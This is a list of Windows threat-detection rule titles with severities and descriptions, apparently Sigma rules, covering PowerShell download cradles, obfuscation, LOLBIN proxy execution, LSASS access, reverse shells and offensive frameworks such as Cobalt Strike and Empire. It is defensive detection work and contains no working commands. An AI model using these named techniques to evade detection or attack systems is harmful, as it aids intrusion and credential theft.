Network Connection Initiated By Regsvr32.EXE | medium | Detects a network connection initiated by "Regsvr32.exe"
Microsoft Sync Center Suspicious Network Connections | medium | Detects suspicious connections from Microsoft Sync Center to non-private IPs.
Rundll32 Internet Connection | medium | Detects a rundll32 that communicates with public IP addresses
Potential Remote PowerShell Session Initiated | high | Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicate a remote PowerShell connection.
Outbound Network Connection To Public IP Via Winlogon | medium | Detects a "winlogon.exe" process that initiates network communications with public IP addresses
Alternate PowerShell Hosts Pipe | medium | Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
New PowerShell Instance Created | informational | Detects the execution of PowerShell via the creation of a named pipe starting with PSHost
PUA - CSExec Default Named Pipe | medium | Detects default CSExec pipe creation
PUA - PAExec Default Named Pipe | medium | Detects the PAExec default named pipe
PUA - RemCom Default Named Pipe | medium | Detects default RemCom pipe creation
WMI Event Consumer Created Named Pipe | medium | Detects the WMI Event Consumer service scrcons.exe creating a named pipe
Nslookup PowerShell Download Cradle | medium | Detects a PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
PsExec Tool Execution From Suspicious Locations - PipeName | medium | Detects PsExec default pipe creation where the image executed is located in a suspicious location, which could indicate that the tool is being used in an attack
PowerShell Downgrade Attack - PowerShell | medium | Detects a PowerShell downgrade attack by comparing the host version with the actually used engine version 2.0
PowerShell Called from an Executable Version Mismatch | high | Detects PowerShell called from an executable by the version mismatch method
Remote PowerShell Session (PS Classic) | low | Detects remote PowerShell sessions
Renamed Powershell Under Powershell Channel | low | Detects a renamed PowerShell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
Suspicious PowerShell Download | medium | Detects a suspicious PowerShell download command
Suspicious Non PowerShell WSMAN COM Provider | medium | Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
Alternate PowerShell Hosts - PowerShell Module | medium | Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Bad Opsec Powershell Code Artifacts | critical | Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
Malicious PowerShell Scripts - PoshModule | high | Detects the execution of known offensive PowerShell scripts used for exploitation or reconnaissance
Invoke-Obfuscation CLIP+ Launcher - PowerShell ModulehighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell ModulehighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
Invoke-Obfuscation STDIN+ Launcher - PowerShell ModulehighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShell ModulehighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell ModulemediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell ModulemediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowerShell ModulehighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShell ModulehighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Clip - PowerShell ModulehighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShell ModulehighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell ModulehighDetects Obfuscated Powershell via VAR++ LAUNCHER
Malicious PowerShell Commandlets - PoshModulehighDetects Commandlet names from well-known PowerShell exploitation frameworks
Remote PowerShell Session (PS Module)highDetects remote PowerShell sessions
Suspicious PowerShell Download - PoshModulemediumDetects suspicious PowerShell download command
Suspicious PowerShell Invocations - Generic - PowerShell ModulehighDetects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific - PowerShell ModulehighDetects suspicious PowerShell invocation command parameters
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Add Windows Capability Via PowerShell ScriptmediumDetects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
PowerShell ADRecon ExecutionhighDetects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
AMSI Bypass Pattern Assembly GetTypehighDetects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Silence.EDA DetectioncriticalDetects Silence EmpireDNSAgent as described in the Group-IP report
PowerShell Create Local UsermediumDetects creation of a local user via PowerShell
DSInternals Suspicious PowerShell Cmdlets - ScriptBlockhighDetects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
HackTool - WinPwn Execution - ScriptBlock | high | Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Import PowerShell Modules From Suspicious Directories | medium | Detects PowerShell scripts that import modules from suspicious directories
Invoke-Obfuscation CLIP+ Launcher - PowerShell | high | Detects obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell | high | Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation STDIN+ Launcher - Powershell | high | Detects obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShell | high | Detects obfuscated use of environment variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - Powershell | high | Detects obfuscated PowerShell via stdin in scripts
Invoke-Obfuscation Via Use Clip - Powershell | high | Detects obfuscated PowerShell via use of Clip.exe in scripts
Invoke-Obfuscation Via Use MSHTA - PowerShell | high | Detects obfuscated PowerShell via use of MSHTA in scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShell | high | Detects obfuscated PowerShell via use of Rundll32 in scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell | high | Detects obfuscated PowerShell via VAR++ LAUNCHER
Malicious PowerShell Commandlets - ScriptBlock | high | Detects cmdlet names from well-known PowerShell exploitation frameworks
Malicious PowerShell Keywords | medium | Detects keywords from well-known PowerShell exploitation frameworks
Powershell MsXml COM Object | medium | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.
Malicious Nishang PowerShell Commandlets | high | Detects cmdlet names and arguments from the Nishang exploitation framework
NTFS Alternate Data Stream | high | Detects writing data into NTFS alternate data streams from PowerShell. Needs Script Block Logging.
PowerView PowerShell Cmdlets - ScriptBlock | high | Detects cmdlet names from PowerView of the PowerSploit exploitation framework.
PowerShell Credential Prompt | high | Detects PowerShell calling a credential prompt
PSAsyncShell - Asynchronous TCP Reverse Shell | high | Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell
PowerShell PSAttack | high | Detects the use of the PSAttack PowerShell hack tool
PowerShell Remote Session Creation | medium | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.
Change PowerShell Policies to an Insecure Level - PowerShell | medium | Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.
PowerShell ShellCode | high | Detects Base64 encoded shellcode
Malicious ShellIntel PowerShell Commandlets | high | Detects cmdlet names from ShellIntel exploitation scripts.
Potential PowerShell Obfuscation Using Character Join | low | Detects specific techniques often seen used inside of PowerShell scripts to obfuscate alias creation
Suspicious PowerShell Download - Powershell Script | medium | Detects suspicious PowerShell download command
Powershell Execute Batch Script | medium | Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Suspicious PowerShell Invocations - Generic | high | Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific | high | Detects suspicious PowerShell invocation command parameters
Potential Suspicious PowerShell Keywords | medium | Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
Potential PowerShell Obfuscation Using Alias Cmdlets | low | Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts
Usage Of Web Request Commands And Cmdlets - ScriptBlock | medium | Detects the use of various web request commands with command-line tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
Potential WinAPI Calls Via PowerShell Scripts | high | Detects use of WinAPI functions in PowerShell scripts
Windows Defender Exclusions Added - PowerShell | medium | Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
WMImplant Hack Tool | high | Detects parameters used by WMImplant
WMIC Unquoted Services Path Lookup - PowerShell | medium | Detects a known WMI recon method to look for unquoted service paths, often used by pentesters and attackers inside PowerShell enumeration scripts
Powershell XML Execute Command | medium | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.
CMSTP Execution Process Access | high | Detects various indicators of Microsoft Connection Manager Profile Installer execution
HackTool - CobaltStrike BOF Injection Pattern | high | Detects a typical pattern of a CobaltStrike BOF which injects into other processes
HackTool - LittleCorporal Generated Maldoc Injection | high | Detects the process injection of a LittleCorporal generated Maldoc.
HackTool - HandleKatz Duplicating LSASS Handle | high | Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
Remote LSASS Process Access Through Windows Remote Management | high | Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
Potential Direct Syscall of NtOpenProcess | medium | Detects potential calls to NtOpenProcess directly from NTDLL.
Potential DLL Injection Via AccCheckConsole | medium | Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass them via the CLI, and they would then be loaded in the context of the "AccCheckConsole" utility.
Potential Adplus.EXE Abuse | high | Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
Uncommon Child Process Of Appvlp.EXE | medium | Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
Data Export From MSSQL Table Via BCP.EXE | medium | Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
Suspicious Child Process Of BgInfo.EXE | high | Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Uncommon Child Process Of BgInfo.EXE | medium | Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Chromium Browser Headless Execution To Mockbin Like Site | high | Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
Potential Binary Proxy Execution Via Cdb.EXE | medium | Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
File Download From IP Based URL Via CertOC.EXE | high | Detects when a user downloads a file from an IP based URL using CertOC.exe
Potential Arbitrary File Download Via Cmdl32.EXE | medium | Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
Potential Dosfuscation Activity | medium | Detects possible payload obfuscation via the command line
Command Line Execution with Suspicious URL and AppData Strings | medium | Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Suspicious File Execution From Internet Hosted WebDav Share | high | Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
Cmd.EXE Missing Space Characters Execution Anomaly | high | Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or a fat finger problem (typo by the developer).
Potential CommandLine Path Traversal Via Cmd.EXE | high | Detects a potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
Read Contents From Stdin Via Cmd.EXE | medium | Detects the use of "<" to read and potentially execute a file via cmd.exe
Unusual Parent Process For Cmd.EXE | medium | Detects a suspicious parent process for cmd.exe
CMSTP Execution Process Creation | high | Detects various indicators of Microsoft Connection Manager Profile Installer execution
Conhost.exe CommandLine Path Traversal | high | Detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
Conhost Spawned By Uncommon Parent Process | medium | Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
Control Panel Items | high | Detects the malicious use of a control panel item
Csc.EXE Execution Form Potentially Suspicious Parent | high | Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Csi.exe Usage | medium | Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in the command line. An early version of this utility provided with the Microsoft "Roslyn" Community Technology Preview was named 'rcsi.exe'
Suspicious Use of CSharp Interactive Console | high | Detects the execution of the CSharp interactive console by PowerShell
Potential Cookies Session Hijacking | medium | Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
Curl Web Request With Potential Custom User-Agent | medium | Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings
File Download From IP URL Via Curl.EXE | medium | Detects file downloads directly from an IP address URL using curl.exe
Suspicious File Download From IP Via Curl.EXE | high | Detects potentially suspicious file downloads directly from IP addresses using curl.exe
Suspicious File Download From File Sharing Domain Via Curl.EXE | high | Detects potentially suspicious file downloads from file sharing domains using curl.exe
Insecure Transfer Via Curl.EXE | medium | Detects execution of "curl.exe" with the "--insecure" flag.
Insecure Proxy/DOH Transfer Via Curl.EXE | medium | Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
Local File Read Using Curl.EXE | medium | Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
Uncommon Child Process Of Defaultpack.EXE | medium | Detects uncommon child processes of the "DefaultPack.EXE" binary as a proxy to launch other programs
Potentially Suspicious Child Process Of ClickOnce Application | medium | Detects potentially suspicious child processes of a ClickOnce deployment application
Arbitrary MSI Download Via Devinit.EXE | medium | Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Potential Discovery Activity Via Dnscmd.EXE | medium | Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
Binary Proxy Execution Via Dotnet-Trace.EXE | medium | Detects command-line arguments for executing a child process via dotnet-trace.exe
Forfiles Command Execution | medium | Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.
Use of FSharp Interpreters | medium | Detects the execution of the FSharp interpreters "FsiAnyCpu.exe" and "FSi.exe". Both can be used for AWL bypass and to execute F# code via scripts or inline.
Fsutil Behavior Set SymlinkEvaluation | medium | A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
Potential Arbitrary Command Execution Via FTP.EXE | medium | Detects execution of an "ftp.exe" script with the "-s" or "/s" flag and any child processes run by "ftp.exe".
File Decryption Using Gpg4win | medium | Detects usage of Gpg4win to decrypt files
File Encryption Using Gpg4win | medium | Detects usage of Gpg4win to encrypt files
File Encryption/Decryption Via Gpg4win From Suspicious Locations | high | Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
Arbitrary Binary Execution Using GUP Utility | medium | Detects execution of the Notepad++ updater (gup) to launch other commands or executables
HTML Help HH.EXE Suspicious Child Process | high | Detects a suspicious child process of Microsoft HTML Help (HH.exe)
Suspicious HH.EXE Execution | high | Detects a suspicious execution of Microsoft HTML Help (HH.exe)
HackTool - Bloodhound/Sharphound Execution | high | Detects command line parameters used by the Bloodhound and Sharphound hack tools
Operator Bloopers Cobalt Strike Commands | high | Detects use of Cobalt Strike commands accidentally entered in the CMD shell
Operator Bloopers Cobalt Strike Modules | high | Detects Cobalt Strike modules/commands accidentally entered in the CMD shell
Potential CobaltStrike Process Patterns | high | Detects potential process patterns related to Cobalt Strike beacon activity
HackTool - Covenant PowerShell Launcher | high | Detects suspicious command lines used in Covenant launchers
HackTool - CrackMapExec Execution | high | This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - CrackMapExec Execution Patterns | high | Detects various execution patterns of the CrackMapExec pentesting framework
HackTool - CrackMapExec PowerShell Obfuscation | high | The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
HackTool - Empire PowerShell Launch Parameters | high | Detects suspicious PowerShell command line parameters used in Empire
HackTool - Potential Impacket Lateral Movement Activity | high | Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework
HackTool - Impacket Tools Execution | high | Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
Invoke-Obfuscation COMPRESS OBFUSCATION | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Invoke-Obfuscation CLIP+ Launcher | high | Detects obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation | high | Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation STDIN+ Launcher | high | Detects obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher | high | Detects obfuscated use of environment variables to execute PowerShell
Invoke-Obfuscation Via Stdin | high | Detects obfuscated PowerShell via stdin in scripts
Invoke-Obfuscation Via Use Clip | high | Detects obfuscated PowerShell via use of Clip.exe in scripts
Invoke-Obfuscation Via Use MSHTA | high | Detects obfuscated PowerShell via use of MSHTA in scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION | high | Detects obfuscated PowerShell via VAR++ LAUNCHER
HackTool - Jlaive In-Memory Assembly Execution | medium | Detects the use of Jlaive to execute assemblies in a copied PowerShell
HackTool - Koadic Execution | high | Detects command line parameters used by the Koadic hack tool
HackTool - PCHunter Execution | high | Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
HackTool - Default PowerSploit/Empire Scheduled Task Creation | high | Detects the creation of a schtask via the PowerSploit or Empire default configuration.
HackTool - RedMimicry Winnti Playbook Execution | high | Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility
Potential SMB Relay Attack Tool Execution | critical | Detects different hacktools used for relay attacks on Windows for privilege escalation
HackTool - SharpWSUS/WSUSpendu Execution | high | Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
HackTool - Sliver C2 Implant Activity Pattern | critical | Detects process activity patterns as seen being used by Sliver C2 framework implants
HackTool - Stracciatella Execution | high | Detects Stracciatella, which executes a PowerShell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.
HackTool - WinPwn Execution | high | Detects command-line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious ZipExec Execution | medium | ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Suspicious HWP Sub Processes | high | Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
ImagingDevices Unusual Parent/Child Processes | high | Detects unusual parents or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Arbitrary File Download Via IMEWDBLD.EXE | high | Detects usage of "IMEWDBLD.exe" to download arbitrary files
Java Running with Remote Debugging | medium | Detects a JAVA process running with remote debugging allowing more than just localhost to connect
Computer Password Change Via Ksetup.EXE | medium | Detects a password change for the computer's domain account or host principal via "ksetup.exe"
Potentially Suspicious Child Process of KeyScrambler.exe | medium | Detects potentially suspicious child processes of KeyScrambler.exe
Logged-On User Password Change Via Ksetup.EXE | medium | Detects a password change for the logged-on user's account via "ksetup.exe"
Rebuild Performance Counter Values Via Lodctr.EXE | medium | Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite the performance counter configuration to confuse and evade monitoring and security solutions.
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS | medium | Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
MpiExec Lolbin | high | Detects a certain command line flag combination used by the mpiexec.exe LOLBIN from HPC Pack that can be used to execute any other binary
Execute MSDT Via Answer File | high | Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (for example from the compatibility tab)
Use of OpenConsole | medium | Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries to bypass application whitelisting
Use of Pcalua For Execution | medium | Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
Indirect Command Execution By Program Compatibility Wizard | low | Detects indirect command execution via the Program Compatibility Assistant pcwrun.exe
Execute Pcwrun.EXE To Leverage Follina | high | Detects indirect command execution via the Program Compatibility Assistant "pcwrun.exe" leveraging the Follina (CVE-2022-30190) vulnerability
Execute Code with Pester.bat as Parent | medium | Detects code execution via Pester.bat (Pester - PowerShell module for testing)
Execute Code with Pester.bat | medium | Detects code execution via Pester.bat (Pester - PowerShell module for testing)
Suspicious Runscripthelper.exe | medium | Detects execution of PowerShell scripts via Runscripthelper.exe
Use of Scriptrunner.exe | medium | The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
Using SettingSyncHost.exe as LOLBin | high | Detects using SettingSyncHost.exe to run a hijacked binary
Use Of The SFTP.EXE Binary As A LOLBIN | medium | Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
MMC20 Lateral Movement | high | Detects MMC20.Application lateral movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
Arbitrary File Download Via MSEDGE_PROXY.EXE | medium | Detects usage of "msedge_proxy.exe" to download arbitrary files
Remotely Hosted HTA File Executed Via Mshta.EXE | high | Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
Wscript Shell Run In CommandLine | medium | Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate suspicious activity
MSHTA Suspicious Execution 01 | high | Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Suspicious Mshta.EXE Execution Patterns | high | Detects suspicious mshta process execution patterns
Arbitrary File Download Via MSOHTMED.EXEmediumDetects usage of "MSOHTMED" to download arbitrary files
Arbitrary File Download Via MSPUB.EXEmediumDetects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
Detection of PowerShell Execution via Sqlps.exemediumThis rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
SQL Client Tools PowerShell Session DetectionmediumThis rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Start Windows Service Via Net.EXElowDetects the usage of the "net.exe" command to start a service using the "start" flag
Outlook EnableUnsafeClientMailRules Setting EnabledhighDetects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
Suspicious Outlook Child ProcesshighDetects a suspicious process spawning from an Outlook process.
Suspicious Remote Child Process From OutlookhighDetects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
Suspicious Binary In User Directory Spawned From Office ApplicationhighDetects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
Suspicious Microsoft Office Child ProcesshighDetects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
PDQ Deploy Remote Adminstartion Tool ExecutionmediumDetect use of PDQ Deploy remote admin tool
Potentially Suspicious Execution Of PDQDeployRunnermediumDetects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
Perl Inline Command ExecutionmediumDetects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
Php Inline Command ExecutionmediumDetects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Add Windows Capability Via PowerShell CmdletmediumDetects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
Suspicious Encoded PowerShell Command LinehighDetects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
Suspicious PowerShell Encoded Command PatternshighDetects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains
PowerShell Base64 Encoded FromBase64String CmdlethighDetects a base64 encoded "FromBase64String" method call in a process command line
Malicious Base64 Encoded PowerShell Keywords in Command LineshighDetects base64 encoded strings used in hidden malicious PowerShell command lines
PowerShell Base64 Encoded IEX CmdlethighDetects usage of a base64 encoded "IEX" cmdlet in a process command line
PowerShell Base64 Encoded Invoke KeywordhighDetects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
PowerShell Base64 Encoded Reflective Assembly LoadhighDetects base64 encoded .NET reflective loading of Assembly
Suspicious Encoded And Obfuscated Reflection Assembly Load Function CallhighDetects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
PowerShell Base64 Encoded WMI ClasseshighDetects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
Potential PowerShell Obfuscation Via Reversed CommandshighDetects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
ConvertTo-SecureString Cmdlet Usage Via CommandLinemediumDetects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity
Potential PowerShell Command Line ObfuscationhighDetects PowerShell command lines containing special characters used for obfuscation
PowerShell Execution With Potential Decryption CapabilitieshighDetects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.
Potential PowerShell Downgrade AttackmediumDetects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0)
PowerShell Web DownloadmediumDetects suspicious ways to download files or content using PowerShell
Obfuscated PowerShell OneLiner ExecutionhighDetects the execution of a specific OneLiner to download and execute powershell modules in memory.
Potential DLL File Download Via PowerShell Invoke-WebRequestmediumDetects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
PowerShell Download and Execution CradleshighDetects PowerShell download and execution cradles.
PowerShell Download PatternmediumDetects a Powershell process that contains download commands in its command line string
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXEhighDetects potentially suspicious file downloads from file sharing domains using PowerShell.exe
DSInternals Suspicious PowerShell CmdletshighDetects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell module exposes several internal features of Active Directory and Azure Active Directory, including FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
Suspicious Execution of Powershell with Base64mediumCommandline to launch powershell with a base64 payload
Potential Encoded PowerShell Patterns In CommandLinelowDetects specific combinations of encoding methods in PowerShell via the commandline
Powershell Inline Execution From A FilemediumDetects inline execution of PowerShell code from a file
Certificate Exported Via PowerShellmediumDetects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
Suspicious PowerShell IEX Execution PatternshighDetects suspicious ways to run Invoke-Expression using the IEX alias
Import PowerShell Modules From Suspicious Directories - ProcCreationmediumDetects powershell scripts that import modules from suspicious directories
Malicious PowerShell Commandlets - ProcessCreationhighDetects Commandlet names from well-known PowerShell exploitation frameworks
Non Interactive PowerShell Process SpawnedlowDetects non-interactive PowerShell activity by looking for a "powershell" process whose parent is not a user GUI process such as "explorer.exe".
Potential PowerShell Obfuscation Via WCHARhighDetects suspicious encoded character syntax often used for defense evasion
Execution of Powershell Script in Public FolderhighThis rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
